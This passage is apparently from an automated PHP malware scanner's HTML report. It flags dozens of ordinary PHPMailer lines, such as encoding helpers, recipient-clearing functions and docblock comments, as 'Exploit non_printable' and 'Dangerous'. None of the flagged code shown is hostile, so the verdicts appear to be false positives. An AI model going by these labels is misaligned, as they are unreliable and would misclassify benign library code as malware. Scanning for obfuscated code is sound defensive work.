</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3327</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3329</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3436</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 345</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3485</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearBCCs</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3498</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearReplyTos</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ReturnPath </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAllRecipients</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3530</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3541</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setError</span><span style="color: #007700">(</span><span style="color: #0000BB">$msg</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3563</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">an RFC 822 formatted date</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3568</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">rfcDate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3573</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">date</span><span style="color: #007700">(</span><span style="color: #DD0000">'D, j M Y H:i:s O'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3578</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns </span><span style="color: #DD0000">'localhost.localdomain' </span><span style="color: #007700">if </span><span style="color: #0000BB">unknown</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3582</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">serverHostname</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3589</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'gethostname'</span><span style="color: #007700">) && </span><span style="color: #0000BB">gethostname</span><span style="color: #007700">() !== </span><span style="color: #0000BB">false</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">lang</span><span style="color: #007700">(</span><span style="color: #0000BB">$key</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3614</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3616</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3618</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3626</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3628</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3640</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3648</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3660</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3671</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3674</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3676</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3693</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
